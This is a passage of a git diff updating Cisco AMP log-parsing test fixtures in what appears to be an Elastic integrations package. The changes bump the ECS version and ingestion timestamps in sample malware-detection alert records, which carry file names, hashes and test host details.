Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542425\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2821,7 +2821,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2853,7 +2853,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581788054Z", + "ingested": "2021-09-13T18:06:53.271953745Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":532000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2910,7 +2910,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2938,7 +2938,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581790080Z", + "ingested": "2021-09-13T18:06:53.271955687Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":454000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667841684537366\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2995,7 +2995,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3027,7 +3027,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581791973Z", + "ingested": "2021-09-13T18:06:53.271957592Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":80000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537365\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3084,7 +3084,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3106,7 +3106,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581793892Z", + "ingested": "2021-09-13T18:06:53.271959511Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258118058508000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258118058508361\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3163,7 +3163,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3191,7 +3191,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581795768Z", + "ingested": "2021-09-13T18:06:53.271961417Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667837389570000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":689000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667837389570068\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3248,7 +3248,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3270,7 +3270,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581797669Z", + "ingested": "2021-09-13T18:06:53.271963308Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258066518901000,\"timestamp\":1610705621,\"timestamp_nanoseconds\":608000000,\"date\":\"2021-01-15T10:13:41+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258066518900808\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3327,7 +3327,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3349,7 +3349,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581799549Z", + "ingested": "2021-09-13T18:06:53.271965221Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258014979293000,\"timestamp\":1610705609,\"timestamp_nanoseconds\":581000000,\"date\":\"2021-01-15T10:13:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258014979293255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3406,7 +3406,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3428,7 +3428,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581801458Z", + "ingested": "2021-09-13T18:06:53.271967114Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176257963439686000,\"timestamp\":1610705597,\"timestamp_nanoseconds\":569000000,\"date\":\"2021-01-15T10:13:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176257963439685702\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3485,7 +3485,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3517,7 +3517,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581803331Z", + "ingested": "2021-09-13T18:06:53.271969012Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":778000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667579691532307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3574,7 +3574,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3602,7 +3602,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581805234Z", + "ingested": "2021-09-13T18:06:53.271970883Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":747000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532306\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3659,7 +3659,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3691,7 +3691,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581807110Z", + "ingested": "2021-09-13T18:06:53.271972769Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":371000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532305\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3748,7 +3748,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3776,7 +3776,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581809002Z", + "ingested": "2021-09-13T18:06:53.271974626Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667575396565000,\"timestamp\":1610705572,\"timestamp_nanoseconds\":971000000,\"date\":\"2021-01-15T10:12:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667575396565008\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log similarity index 100% rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log-expected.json similarity index 97% rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log-expected.json rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log-expected.json index 26bab6555f6..2774990edfc 100644 --- a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp4.ndjson.log-expected.json +++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp4.log-expected.json @@ -12,7 +12,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -38,7 +38,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843493642Z", + "ingested": "2021-09-13T18:07:04.510322261Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6508397899087348000,\"timestamp\":1610659036,\"timestamp_nanoseconds\":295927133,\"date\":\"2021-01-14T21:17:16+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.6A37D750F0-100.SBX.TG\",\"detection_id\":\"6508397899087347713\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -96,7 +96,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -116,7 +116,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843500994Z", + "ingested": "2021-09-13T18:07:04.510327231Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14930696955218,\"timestamp\":1610656706,\"timestamp_nanoseconds\":844899579,\"date\":\"2021-01-14T20:38:26+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610656706,\"start_date\":\"2021-01-14T20:38:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa692